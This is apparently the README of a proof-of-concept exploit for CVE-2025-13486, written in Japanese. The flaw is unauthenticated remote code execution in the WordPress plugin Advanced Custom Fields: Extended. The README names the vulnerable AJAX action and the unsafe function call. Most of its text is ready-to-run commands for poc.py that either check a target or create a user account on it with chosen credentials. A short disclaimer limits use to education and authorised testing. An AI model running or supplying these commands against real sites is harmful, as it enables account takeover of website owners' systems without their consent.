
CVE-2025-13486 の POC
CVE-2025-13486 の概念実証 (PoC) エクスプロイトです。WordPress プラグイン Advanced Custom Fields: Extended (ACFE) のリモートコード実行脆弱性です。
この脆弱性は、ACFE バージョン 0.9.0.5 から 0.9.1.1 に存在し、認証されていない攻撃者が acfe/form/render_form_ajax AJAX アクションを介して任意の PHP 関数を実行できるようにします。プラグインは、適切な検証なしにユーザーが指定した入力で call_user_func_array() を使用しています。
print_r を使用してターゲットが脆弱かどうかを安全に確認します(非破壊的)pip install requests
python poc.py -u http://target-site.com --verify
# With random credentials (displayed after execution)
python poc.py -u http://target-site.com
# With custom credentials
python poc.py -u http://target-site.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url ターゲットの WordPress URL(必須)
--verify 脆弱性のみ確認(より安全、print_r 使用)
--user 作成するユーザー名(デフォルト: ランダム)
--password 設定するパスワード(デフォルト: ランダム)
--email 設定するメールアドレス(デフォルト: ランダム)
この PoC は、教育目的および許可されたセキュリティテスト目的のみで提供されます。コンピュータシステムへの不正アクセスは違法です。テストの前に必ず適切な承認を得てください。